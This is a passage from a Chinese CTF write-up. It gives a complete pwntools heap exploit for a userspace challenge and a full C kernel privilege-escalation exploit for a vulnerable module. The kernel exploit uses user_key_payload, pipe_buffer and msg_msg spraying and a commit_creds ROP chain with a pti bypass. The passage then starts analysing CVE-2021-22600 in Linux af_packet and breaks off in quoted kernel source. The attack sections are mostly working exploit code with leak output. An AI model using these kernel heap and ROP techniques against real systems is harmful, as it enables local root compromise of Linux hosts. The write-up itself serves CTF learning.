Rod: 0\xd6A\x00\x00\x00\x11\x00\x7f\x00X-A\x00\x00\x00\xc6\xd5\x00\x00\x00\x00\x00\x00\x00ddddddd\x00bbbbbb!\x00\x00\x00\x00\xc5\xd5\x00\x00\x00\xc6\xd5\x00\x00\x00\xc5\xd5\x00\x00\x00\x00\x00\x00\x00\xd6A\x00\x00\x00\x0b\x00\x7f\x00\x98.A\x00\x00\x00\xc6\xd5\x00\x00\x00\x00\x00\x00\x00ddddddd\x00bbbbbb\xb8.A\x00\x00\x00\xc7\xd5\x00\x00\x00\x05\x00\x00\x00\x05\x00\x00\x00bbbbbbb\xc0\xc6\xd5\x00\x00\x00\x00\x00\x00\x00bbbbbbbbbbbbbb\xe0\xc6\xd5\x00\x00\x00\x00\x00\x00\x00ddddddd\x00bbbbbb@\xd0\xd5\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00bbbbbbbbbbbbbbb!\x00\x00\x00\x00#\xd4\x00\x00H#\xd4\x00\x00P\xc6\xd5\x00\x00\x00\x05\x00\x00\x00\xd6A\x00\x00\x00\x11\x00\x7f\x00X-A\x00\x00\x00\xc6\xd5\x00\x00\x00\x00\x00\x00\x00ddddddd\x00bbbbbb!\x00\x00\x00\x00\xc5\xd5\x00\x00\x00\xc6\xd5\x00\x00\x00\xc5\xd5\x00\x00\x00\x00\x00\x00\x00\xd6A\x00\x00\x00\x0b\x00\x7f\x00X-A\x00\x00\x00\xc6\xd5\x00\x00\x00\x00\x00\x00\x00ddddddd\x00bbbbbb\xf8-A\x00\x00\xc7\xd5\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb!\x00\x00\x00\x00#\xd4\x00\x00H#\xd4\x00\x00P\xc6\xd5\x00\x00\x00\x05\x00\x00\x00\x11\xbf3\x7f\x00\x00\x96\xbf3\x7f\x000\xc7\xd5\x00\x00\x00\xc7\xd5\x00\x00\x00bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Fuse: eeeeeeeeeeeeeeee
------------------------------

可以发现:Ruby 的释放和重申请似乎影响了 Rod,可以先用 GDB 定位泄露数据的地址,然后定位可利用数据的位置,泄露 libc_base,heap_base,pro_base:

之后在尝试的过程中发现 Drop_Weapon 会导致 Drop_RodDrop_Ruby 可以再次执行(原本会被程序检查并制止),第二次调用析构函数的过程会导致其虚表发生错误,配合堆风水就可以劫持程序流程

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
gdb.attach(p,"b* 0x40a11b\n")
#gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
pause()

def cmd(op):
sla(">",str(op))

def Take_Ruby(name):
cmd(1)
sla("new owner here:",name)

def Drop_Ruby():
cmd(2)

def Take_Rod(name):
cmd(3)
sla("new owner here:",name)

def Drop_Rod():
cmd(4)

def Fuse_Weapon(name):
cmd(5)
sla("new weapon here",name)

def Drop_Weapon():
cmd(6)

Take_Ruby("a"*0x8)
Take_Rod("b"*0x500)
Fuse_Weapon("c"*0x10)
Drop_Weapon()
Drop_Ruby()
Take_Ruby("d"*0x8)
Fuse_Weapon("e"*0x10)

ru("Rod: ")
leak_addr = u64(p.recv(8).ljust(8,b"\x00"))
pro_base = leak_addr - 0x1e630
success("leak_addr >> "+hex(leak_addr))
leak_addr = u64(p.recv(8).ljust(8,b"\x00"))
success("leak_addr >> "+hex(leak_addr))
leak_addr = u64(p.recv(8).ljust(8,b"\x00"))
success("leak_addr >> "+hex(leak_addr))
leak_addr = u64(p.recv(8).ljust(8,b"\x00"))
heap_base = leak_addr - 0x2c618
success("leak_addr >> "+hex(leak_addr))

ru(p64(0x511))
ru(p64(0x511))
leak_addr = u64(p.recv(8).ljust(8,b"\x00"))
libc_base = leak_addr - 0x1ec100

success("pro_base >> "+hex(pro_base))
success("heap_base >> "+hex(heap_base))
success("libc_base >> "+hex(libc_base))

one_gadgets = [0xe6aee,0xe6af1,0xe6af4]
one_gadget = libc_base + one_gadgets[0]
success("one_gadget >> "+hex(one_gadget))

#debug()
Drop_Ruby()
Take_Ruby(p64(heap_base+0x2ccd8))
Drop_Rod()
Take_Rod(p64(one_gadget))
Fuse_Weapon("e"*0x10)

cmd(6)
cmd(4)

p.interactive()

core

1
2
/ $ cat /proc/version 
Linux version 5.8.0 (vm@vm-pc) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #1 SMP Fri May 12 11:14:51 CST 2023
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh

qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 qiet loglevel=3 oops=panic panic=-1 pti=on" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1
  • smap,smep,pti,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2

insmod /baby.ko
chmod 666 /dev/baby

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

poweroff -d 0 -f

漏洞分析

题目的边界检查有问题,全局变量 heap_var.chunk_list[indext] 出现溢出并且可以覆盖 heap_var.use_list[indext]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
index = 0;
while ( 1 )
{
indext = index;
chunkt = heap_var.chunk_list[index];
if ( !chunkt )
break;
if ( (unsigned int)chunkt->key < key )
{
index = 2 * index + 1;
if ( index > 0xF )
goto LABEL_7;
}
else
{
index = 2 * index + 2;
if ( index > 0xF )
goto LABEL_7;
}
}
chunk = (Chunk *)kmem_cache_alloc(kmalloc_caches[6], 0xDC0LL, 0LL); /* kmalloc-64 */
--add_count;
heap_var.use_list[indext] = 1LL;
heap_var.chunk_list[indext] = chunk;
chunk->key = key;

程序通过 heap_var.use_list[indext] 判断 chunk 是否被 free,覆盖这里会导致 UAF

测试 Poc 如下:

1
2
3
4
5
6
add(0x400-0x40); // 0
add(0x400-0x30); // 1
add(0x400-0x20); // 3
add(0x400-0x10); // 7
dele(0);
add(0x400-0x0); // 15
1
2
3
4
5
6
7
8
9
10
11:00880xffffffffc0002480 —▸ 0xffff88800824dac0 ◂— 0x400
12:00900xffffffffc0002488 —▸ 0xffff88800824dcc0 ◂— 0x3d0
13:00980xffffffffc0002490 ◂— 0x0
14:00a0│ 0xffffffffc0002498 —▸ 0xffff88800824dc40 ◂— 0x3e0
15:00a8│ 0xffffffffc00024a0 ◂— 0x0
... ↓ 2 skipped
18:00c0│ 0xffffffffc00024b8 —▸ 0xffff88800824dd00 ◂— 0x3f0
19:00c8│ 0xffffffffc00024c0 ◂— 0x0
... ↓ 6 skipped
20:01000xffffffffc00024f8 —▸ 0xffff88800824dac0 ◂— 0x400

入侵思路

内核模块使用 kmalloc-64,存在 UAF 漏洞但利用有限制:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
while ( 1 )
{
while ( 1 )
{
chunk = heap_var.chunk_list[index];
if ( !chunk )
return 0;
if ( (unsigned int)chunk->key >= size )
break;
index = 2 * index + 1;
if ( index > 0xF )
return 0;
}
if ( (unsigned int)chunk->key <= size )
break;
index = 2 * index + 2;
if ( index > 0xF )
return 0;
}

内核模块会匹配 chunk->key,因此用于占位的内核结构体的前2字节必须已知(当然也可以爆破)

此时 user_key_payload 结构体就是最好的选择:

1
2
3
4
5
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};
  • 在 rcu 锁触发前,user_key_payload->rcu_head 都不会被初始化
1
2
3
4
5
6
7
pwndbg> telescope 0xffff88800828e400
00:0000│ rdi r8 0xffff88800828e400 ◂— 0x400
01:00080xffff88800828e408 ◂— 0x0
02:00100xffff88800828e410 ◂— 0x20 /* ' ' */
03:00180xffff88800828e418 ◂— '22222222222222222222222222222222'
... ↓ 3 skipped
07:00380xffff88800828e438 ◂— 0x0
  • 此时可以通过 UAF 修改 user_key_payload->datalen 来完成泄露

泄露脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
add(0x400-0x40); // 0
add(0x400-0x30); // 1
add(0x400-0x20); // 3
add(0x400-0x10); // 7
dele(0);
add(0x400-0x00); // 15

dele(15);

memset(data, 0x32, sizeof(data));
key_id = key_alloc("11111111", data, 0x20);
if (key_id < 0)
err_exit("key_alloc error");

for (int i = 0; i < PIPE_NUM; i++){
if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 1) < 0){
/* 1 * pipe_buffer = 0x30 kmalloc-64 */
err_exit("fcntl");
}
}

for (int i = 0; i < PIPE_NUM; i++){
write(pipe_fd[i][1], "AAAAAAAA", 8); // tag
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], "AAAAAAAA", 8);
write(pipe_fd[i][1], "BBBBBBBB", 8);
}

memset(data, 0, sizeof(data));
*(int *)&data[0x0] = 0x400; /* 修改chunk->key */
*(int *)&data[0x10] = 0x400; /* 修改user_key_payload->datalen */
edit(0x400,data);

int res = key_read(key_id, data, 0x400);
print_hex(data,sizeof(data));

index = -1;
for (int i = 0; i < sizeof(data)/8; i++){
if(*(uint64_t *)&data[i*8] >= 0x1800000000 && *(uint64_t *)&data[i*8] <= 0x3800000000){
index = i*8;
break;
}
}
if(index == -1){
err_exit("scan");
}

pipe_page_addr = *(uint64_t *)&data[index-8];
pipe_ops_addr = *(uint64_t *)&data[index+8];
printf("pipe_page_addr: 0x%lx\n",pipe_page_addr);
printf("pipe_ops_addr: 0x%lx\n",pipe_ops_addr);

kernel_offset = pipe_ops_addr - 0xffffffff81a0ec80;
kernel_base = 0xffffffff81000000 + kernel_offset;
printf("kernel_offset: 0x%lx\n",kernel_offset);
printf("kernel_base: 0x%lx\n",kernel_base);

接下来将 pipe_buffer 释放掉,重新填充 msg_msg 并泄露 msg_msg->list_head

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(uint64_t *)&primary_msg.mtext[0] = 0xffffffff81155279 + kernel_offset; // PUSH_RSI_POP_RSP_POP_4VAL_RET
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(uint64_t *)&secondary_msg.mtext[0] = pipe_ops_addr;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

if(i < PIPE_NUM){
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}
}

memset(data, 0, sizeof(data));
*(int *)&data[0x0] = 0x400; /* 修改chunk->key */
*(int *)&data[0x10] = 0x400; /* 修改user_key_payload->datalen */
edit(0x400,data);

res = key_read(key_id, data, 0x400);
print_hex(data,sizeof(data));

index = -1;
for (int i = 0; i < sizeof(data)/8; i++){
if(*(uint64_t *)&data[i*8] == pipe_ops_addr){
index = i*8;
break;
}
}
if(index == -1){
err_exit("scan");
}

msg_addr = *(uint64_t *)&data[index-8*5];
victim_addr = msg_addr + 0x30;
printf("msg_addr: 0x%lx\n",msg_addr);
printf("victim_addr: 0x%lx\n",victim_addr);

最后就可以劫持 pipe_buffer

先释放 user_key_payload 部署 pipe_buffer,由于我们泄露了 msg_msg->list_head,因此我们可以直接将 pipe_buf_operations 伪造在 msg_msg 中(地址已知)

利用 SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 绕过 pti,并提权(由于本题目没有给符号,因此相关地址需要使用 bindiff 进行推测)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PIPE_NUM 0x20
#define MSG_QUEUE_NUM 0x20
#define PRIMARY_MSG_SIZE 0x100-0x10
#define SECONDARY_MSG_SIZE 0x40-0x10

#define PRIMARY_MSG_TYPE 0x31
#define SECONDARY_MSG_TYPE 0x32

int fd;
struct argg {
size_t key;
size_t key2;
char* data;
size_t c;
};

int add(int key2){
struct argg arg = {.key2 = key2};
return ioctl(fd, 0x1001, &arg);
}

int dele(int index){
struct argg arg = {.key2 = index};
return ioctl(fd, 0x1003, &arg);
}

int edit(int key2,char *data){
struct argg arg = {.key2 = key2, .data = data};
return ioctl(fd, 0x1002, &arg);
}

int func(int key, int key2, char *data){
struct argg arg = {.key = key, .key2 = key2, .data = data};
return ioctl(fd, 0x2333, &arg);
}

struct
{
long mtype;
char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
}primary_msg;

struct
{
long mtype;
char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
}secondary_msg;

int main(int argc , char **argv, char **envp)
{
char data[0x400];
int key_id;
int index;
int pipe_fd[PIPE_NUM*10][2];
int msqid[MSG_QUEUE_NUM];
uint64_t pipe_page_addr,pipe_ops_addr;
uint64_t victim_addr,msg_addr;
struct pipe_buffer *pipe_buf_ptr;
struct pipe_buf_operations *ops_ptr;
uint64_t *rop_chain;
int rop_idx;

save_status();
bind_core(0);
unshare_setup();

fd = open("/dev/baby", O_RDWR);
if (fd < 0)
err_exit("open /dev/baby");

for (int i = 0; i < PIPE_NUM; i++){
if (pipe(pipe_fd[i]) < 0)
err_exit("FAILED to spary pipe");
}

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
err_exit("failed to create msg_queue!");
}

add(0x400-0x40); // 0
add(0x400-0x30); // 1
add(0x400-0x20); // 3
add(0x400-0x10); // 7
dele(0);
add(0x400-0x00); // 15

dele(15);

memset(data, 0x32, sizeof(data));
key_id = key_alloc("11111111", data, 0x20);
if (key_id < 0)
err_exit("key_alloc error");

for (int i = 0; i < PIPE_NUM; i++){
if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 1) < 0){
/* 1 * pipe_buffer = 0x30 kmalloc-64 */
err_exit("fcntl");
}
}

for (int i = 0; i < PIPE_NUM; i++){
write(pipe_fd[i][1], "AAAAAAAA", 8); // tag
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], "AAAAAAAA", 8);
write(pipe_fd[i][1], "BBBBBBBB", 8);
}

memset(data, 0, sizeof(data));
*(int *)&data[0x0] = 0x400; /* 修改chunk->key */
*(int *)&data[0x10] = 0x400; /* 修改user_key_payload->datalen */
edit(0x400,data);

int res = key_read(key_id, data, 0x400);
print_hex(data,sizeof(data));

index = -1;
for (int i = 0; i < sizeof(data)/8; i++){
if(*(uint64_t *)&data[i*8] >= 0x1800000000 && *(uint64_t *)&data[i*8] <= 0x3800000000){
index = i*8;
break;
}
}
if(index == -1){
err_exit("scan");
}

pipe_page_addr = *(uint64_t *)&data[index-8];
pipe_ops_addr = *(uint64_t *)&data[index+8];
printf("pipe_page_addr: 0x%lx\n",pipe_page_addr);
printf("pipe_ops_addr: 0x%lx\n",pipe_ops_addr);

kernel_offset = pipe_ops_addr - 0xffffffff81a0ec80;
kernel_base = 0xffffffff81000000 + kernel_offset;
printf("kernel_offset: 0x%lx\n",kernel_offset);
printf("kernel_base: 0x%lx\n",kernel_base);

memset(&primary_msg, 0, sizeof(primary_msg));
memset(&secondary_msg, 0, sizeof(secondary_msg));

rop_idx = 0;
rop_chain = (uint64_t*) &primary_msg.mtext[8];
rop_chain[rop_idx++] = kernel_offset + 0xffffffff8102ae6d; // pop_rdi_ret
/* 对比分析look_up_user_keyrings来计算偏移 */
rop_chain[rop_idx++] = kernel_offset + 0xFFFFFFFF81C33060; // INIT_CRED
rop_chain[rop_idx++] = kernel_offset + 0xFFFFFFFF8106E4F0; // COMMIT_CREDS
/* search -t qword 0x5c415d415e415f41 */
rop_chain[rop_idx++] = kernel_offset + 0xffffffff81600df0+22; // SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22;
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = get_root_shell;
rop_chain[rop_idx++] = user_cs;
rop_chain[rop_idx++] = user_rflags;
rop_chain[rop_idx++] = user_sp;
rop_chain[rop_idx++] = user_ss;

/*
<pt> 0xffffffff8109aaa9 push rsi
<pt> 0xffffffff8109d984 push rsi
<pt> 0xffffffff81155279 push rsi
*/

for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(uint64_t *)&primary_msg.mtext[0] = 0xffffffff81155279 + kernel_offset; // PUSH_RSI_POP_RSP_POP_4VAL_RET
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(uint64_t *)&secondary_msg.mtext[0] = pipe_ops_addr;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

if(i < PIPE_NUM){
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}
}

memset(data, 0, sizeof(data));
*(int *)&data[0x0] = 0x400; /* 修改chunk->key */
*(int *)&data[0x10] = 0x400; /* 修改user_key_payload->datalen */
edit(0x400,data);

res = key_read(key_id, data, 0x400);
print_hex(data,sizeof(data));

index = -1;
for (int i = 0; i < sizeof(data)/8; i++){
if(*(uint64_t *)&data[i*8] == pipe_ops_addr){
index = i*8;
break;
}
}
if(index == -1){
err_exit("scan");
}

msg_addr = *(uint64_t *)&data[index-8*5];
victim_addr = msg_addr + 0x30;
printf("msg_addr: 0x%lx\n",msg_addr);
printf("victim_addr: 0x%lx\n",victim_addr);

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if (read_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to receive secondary msg!");
if(i == MSG_QUEUE_NUM/2){
puts("free key");
key_revoke(key_id);
dele(3);
}
}

puts("try to get UAF");
for (int i = 0; i < PIPE_NUM*10; i++){
if (pipe(pipe_fd[i]) < 0)
err_exit("FAILED to spary pipe");
}

for (int i = 0; i < PIPE_NUM*10; i++){

if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 1) < 0){
/* 1 * pipe_buffer = 0x30 kmalloc-64 */
err_exit("fcntl");
}
}

for (int i = 0; i < PIPE_NUM*10; i++){
write(pipe_fd[i][1], "CCCCCCCC", 8); // tag
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], "CCCCCCCC", 8);
write(pipe_fd[i][1], "BBBBBBBB", 8);
}

memset(data, 0, sizeof(data));
*(uint64_t *)&data[0] = pipe_page_addr;
*(uint64_t *)&data[0x8] = 0x2400000000;
*(uint64_t *)&data[0x10] = victim_addr-8;
*(uint64_t *)&data[0x18] = kernel_offset + 0xffffffff8102ccb5; // pop_rsp_ret
*(uint64_t *)&data[0x20] = victim_addr+8;

for (int i = 0xffff; i > 0; i--){
edit(i,data);
}
sleep(1);

printf("target_addr: 0x%lx\n",0xffffffff81155279 + kernel_offset);
sleep(1);

for (int i = 0; i < PIPE_NUM*6; i++)
{
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

return 0;
}
  • PS:kernelpwn.h 在之前的博客中展示过

CVE-2021-22600

1
2
/ $ cat /proc/version 
Linux version 5.11.16 (arttnba3@ubuntu) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #1 SMP Sat Jun 3 16:53:03 PDT 2023
1
2
3
4
5
6
7
8
9
10
qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 qiet loglevel=3 oops=panic panic=-1 pti=on kaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1 -s
  • smap,smep,pti,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

poweroff -d 0 -f

内核源码下载:Index of /pub/linux/kernel/v5.x/

漏洞分析

本题目的漏洞是 CVE-2021-22600,该漏洞影响版本为:Linux Kernel v5.8.0 - v5.15.0

漏洞位于 /net/packet/af_packet.c 文件,rx_owner_map 引用了 pg_vec,切换到 TPACKET_V3 协议版本中,在 packet_set_ring() 函数的末尾,对 pg_vec 释放了一次,并未对 rx_owner_map 指针置为 NULL

直到从 TPACKET_V3 协议版本切换到 TPACKET_V2 协议版本后,在次到达 packet_set_ring() 函数的末尾,bitmap_free() 函数对 rx_owner_map 指针进行释放,触发 double free 漏洞

核心函数 packet_set_ring 源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err = -EINVAL;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;

rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
if (packet_read_pending(rb))
goto out;
}

if (req->tp_block_nr) { /* 只有第一次调用setsockopt设置RX_RING时才会进入这里 */
unsigned int min_frame_size;

/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;

switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}

err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size))) /* 注意tp_block_size必须与PAGE_SIZE对齐 */
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;

rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0))
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order); /* 其中会调用init_prb_bdqc,导致pg_vec被sock->rx_ring->prb_bdqc->pkbdq引用 */
if (unlikely(!pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) { /* 只能是RX_RING */
init_prb_bdqc(po, rb, pg_vec, req_u);
} else {
struct tpacket_req3 *req3 = &req_u->req3;

if (req3->tp_retire_blk_tov ||
req3->tp_sizeof_priv ||
req3->tp_feature_req_word) {
err = -EINVAL;
goto out_free_pg_vec;
}
}
break;
default:
if (!tx_ring) {
rx_owner_map = bitmap_alloc(req->tp_frame_nr,
GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO);
if (!rx_owner_map)
goto out_free_pg_vec;
}
break;
}
}
/* Done */
else {
err = -EINVAL;
